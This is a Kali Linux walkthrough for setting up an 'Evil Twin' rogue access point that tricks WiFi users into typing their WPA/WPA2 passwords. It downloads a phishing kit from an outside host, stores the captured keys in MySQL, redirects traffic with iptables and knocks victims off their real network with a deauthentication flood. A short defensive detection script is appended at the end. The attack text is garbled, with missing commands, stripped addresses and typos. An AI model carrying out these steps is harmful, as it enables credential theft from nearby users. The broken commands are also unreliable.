Fake Access Point

Evil Twin APs (access points) are rogue access points that pose as legitimate WiFi hotspots. When a person connects to an Evil Twin AP, their information is exposed to the hacker.

To the victim, the malicious access point looks like a hotspot with a strong signal, because the hacker is physically near the victim. People favor strong WiFi networks, so a victim is likely to connect to an Evil Twin AP.

The Process

1. Access your Kali computer.

2. Make sure that you have an internet connection.

3. Launch a terminal and enter

apt-get install dhcp3-server

This command will install a DHCP server onto your machine.

4. Type


And press Enter. Your terminal will display an empty file.

5. Type the following commands:


default-lease-time 600

max-lease-time 6000

subnet netmask {

option subnet-mask

option broadcast-address

option routers

option domain-name-servers



6. Once done, use the CTRL+X key combination and press “Y”.

7. Switch to another directory by typing:

cd /var/www

8. Then, issue the following commands:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

9. Trigger MySQL and the Apache server by typing:

/etc/init.d/mysql start

/etc/init./apache2 start

10. You will use MySQL to generate a database for storing WPA/WPA2 passwords. Here are commands that you must issue:

Mysql –u root

create database evil_twin;

use evil_twin

create tale wpa_keys(passwors varchar(64), confirm varchar(64));

11. Type “ip route” to determine your local IP address.

12. Identify the name of your network adapter using this command:

airmon-ng start wlan0

13. Update the OUI (Organizationally Unique Identifier) of your Airodump-ng program. Here’s the command:


14. Find the ESSID (Extended Service Set Identification), BSSID (the MAC address of your access point), and the channel that you need to use. The command that you should use is:

airodump-ng –M mon0

15. Activate the Evil Twin AP using this syntax:

airbase-ng –e [insert ESSID here] –c [insert channel number here] –P mon0

16. The Airbase-ng program created a tunnel interface on your behalf. You just have to configure this tunnel interface to connect your wired interface and your “evil” access point. To do this, you must launch a terminal and type the following:

ifconfig [name of tunnel interface] netmask

17. Enable internet protocol forwarding through these commands:

route add –net netmask gw

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table net –append POSTROUTING –out-interface

[name of local interface]



iptables –append FORWARD –in-interface [name of tunnel interface] –j ACCEPT

iptables –t net –A PREROUTING –p tcp –dport 80 –j DNET –to-destination [LOCALIP


iptables –t net –A POSTROUTING –j MASQUERADE

dhcpd –cf /etc./dhcpd.conf –pf /var/run/dhcpd.pid [name of tunnel interface]

etc./init.d/isc-dhcp-server start

18. Disconnect your targets from their current wireless networks. To accomplish this, you must generate a “blacklist” file to hold the target’s BSSID. Issue the following commands:

echo [BSSID] > blacklist

mdk3 mon0 d –b blacklist –c [CH.#]

19. Look at the terminal that holds your Airbase-ng program. See if a target connected to your access point. When a person tries to connect, he will see a security page that asks for the WPA/WPA2 key.

20. Check the terminal for your MySQL database and enter the following:

use evil_twin

21. Access “wpa_keys” to view the data entered by your target.
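
From the defender's side, the procedure above leaves two observable traces: a second radio advertising an existing ESSID (step 15) and forced disconnections from the legitimate access point (step 18). The following added example, which is not part of the original page, checks constructed sensor records for both and correlates them. The AP inventory, record layout, thresholds and function names are assumptions, as is the twin being unencrypted.

```python
from collections import defaultdict

# Assumed inventory of the defender's own APs (constructed values).
KNOWN = {"CorpWiFi": {"bssids": {"aa:bb:cc:00:00:01"}, "security": "WPA2", "channels": {6}}}

# Constructed sensor data: beacons as (essid, bssid, channel, security),
# management frames as (seconds, subtype, BSSID of the AP the frame refers to).
BEACONS = [
    ("CorpWiFi", "aa:bb:cc:00:00:01", 6, "WPA2"),   # the inventoried AP
    ("CorpWiFi", "02:11:22:33:44:55", 6, "OPEN"),   # same name, unknown radio, no encryption
    ("GuestNet", "de:ad:be:ef:00:09", 11, "OPEN"),  # not in the inventory, so not judged
]
FRAMES = [(100 + i * 0.2, "deauth", "aa:bb:cc:00:00:01") for i in range(40)]
FRAMES += [(300.0, "deauth", "aa:bb:cc:00:00:01"), (500.0, "disassoc", "aa:bb:cc:00:00:01")]

def find_twins(beacons, known):
    """Flag beacons that reuse an inventoried ESSID from a BSSID not in the inventory."""
    findings = []
    for essid, bssid, channel, security in beacons:
        base = known.get(essid)
        if base is None or bssid in base["bssids"]:
            continue
        reasons = ["unknown BSSID"]
        if security != base["security"]:
            reasons.append(f"security {security} != {base['security']}")
        if channel not in base["channels"]:
            reasons.append(f"channel {channel} off plan")
        findings.append({"essid": essid, "bssid": bssid, "reasons": reasons})
    return findings

def deauth_floods(frames, window=10.0, threshold=20):
    """BSSIDs hit by >= threshold deauth/disassoc frames inside any `window` seconds."""
    times = defaultdict(list)
    for ts, subtype, bssid in sorted(frames):
        if subtype in ("deauth", "disassoc"):
            times[bssid].append(ts)
    return {b for b, s in times.items()
            if any(s[i + threshold - 1] - s[i] <= window
                   for i in range(len(s) - threshold + 1))}

def correlate(beacons, frames, known):
    """High-confidence alert: a twin is on air while the real AP's clients are kicked off."""
    flooded = deauth_floods(frames)
    return [f for f in find_twins(beacons, known)
            if known[f["essid"]]["bssids"] & flooded]
```

Either signal alone is noisy (a newly deployed AP, a roaming client), which is why the alert is raised only when both occur for the same ESSID.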

